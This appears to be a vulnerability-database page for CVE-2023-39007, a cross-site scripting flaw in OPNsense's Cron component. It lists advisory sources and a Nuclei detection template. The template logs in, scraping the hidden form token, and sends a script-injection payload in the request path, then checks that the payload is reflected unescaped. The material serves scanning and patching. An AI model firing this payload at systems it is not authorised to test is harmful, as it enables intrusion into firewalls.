| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2023-39007 | 9 Aug 2023 19:15 | – | attackerkb |
| CVE-2023-39007 | 9 Aug 2023 22:15 | – | circl |
| Deciso OPNsense Cross-Site Scripting Vulnerability | 9 Aug 2023 00:00 | – | cnnvd |
| CVE-2023-39007 | 9 Aug 2023 00:00 | – | cve |
| CVE-2023-39007 | 9 Aug 2023 00:00 | – | cvelist |
| Vulnerabilities fixed in OPNSense | 11 Aug 2023 00:00 | – | ncsc |
| CVE-2023-39007 | 9 Aug 2023 19:15 | – | nvd |
| Design/Logic Flaw | 9 Aug 2023 19:15 | – | prion |
| PT-2023-26733 · Opnsense · Opnsense Community Edition +1 | 9 Aug 2023 00:00 | – | ptsecurity |
| CVE-2023-39007 | 9 Aug 2023 00:00 | – | vulnrichment |

| Source | Link |
|---|---|
| logicaltrust | www.logicaltrust.net/blog/2023/08/opnsense.html |
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2023-39007 |

```yaml
id: CVE-2023-39007

info:
  name: OPNsense - Cross-Site Scripting to RCE
  author: ritikchaddha
  severity: critical
  description: |
    There is a XSS in /ui/cron/item/open in the Cron component of OPNsense Community Edition before 23.7 and Business Edition before 23.4.2 via openAction in app/controllers/OPNsense/Cron/ItemController.php.
  impact: |
    Authenticated attackers can inject malicious JavaScript through the Cron item opening functionality, potentially escalating to remote code execution and compromising the entire firewall/router system and network security.
  remediation: |
    Update OPNsense Community Edition to version 23.7 or later, or Business Edition to version 23.4.2 or later that properly sanitizes input in the Cron ItemController.
  reference:
    - https://logicaltrust.net/blog/2023/08/opnsense.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39007
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
    cvss-score: 9.6
    cve-id: CVE-2023-39007
    cwe-id: CWE-79
    epss-score: 0.02315
    epss-percentile: 0.81333
    cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: opnsense
    product: opnsense
    shodan-query:
      - title:"OPNsense"
      - http.title:"opnsense"
    fofa-query: title="opnsense"
    google-query: intitle:"opnsense"
  tags: cve2023,cve,opnsense,xss,authenticated,rce,vuln

http:
  - raw:
      # Request 1: load the login page; the extractors below read its hidden form field.
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      # Request 2: log in, sending the extracted hidden field name/value with the credentials.
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{para}}={{value}}&usernamefld={{username}}&passwordfld={{password}}&login=1

      # Request 3: request the Cron item page with a marker in the path segment.
      - |
        GET /ui/cron/item/open/0'+alert(document.domain)+' HTTP/1.1
        Host: {{Hostname}}

    # All three matchers must hold: marker reflected unescaped into openDialog(), HTML response, HTTP 200.
    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - "openDialog('0'+alert(document.domain)+''"

      - type: word
        part: header_3
        words:
          - "text/html"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: para
        part: body
        group: 1
        regex:
          - 'type="hidden" name="([a-zA-Z0-9]+)" value="([A-Z0-9a-z]+)" autocomplete="'
        internal: true

      - type: regex
        name: value
        part: body
        group: 2
        regex:
          - 'type="hidden" name="([a-zA-Z0-9]+)" value="([A-Z0-9a-z]+)" autocomplete="'
        internal: true
# digest: 4b0a00483046022100a03294d7c6dae765ab1cb9bc955c16b0a1b67c7dc65bdd6574aa7592d08ce74b022100886aae0e20cec54899eb0ac1b79019fb93fe647b39b230724e1f53c99df1c193:922c64590222798bb761d5b6d8e72950
```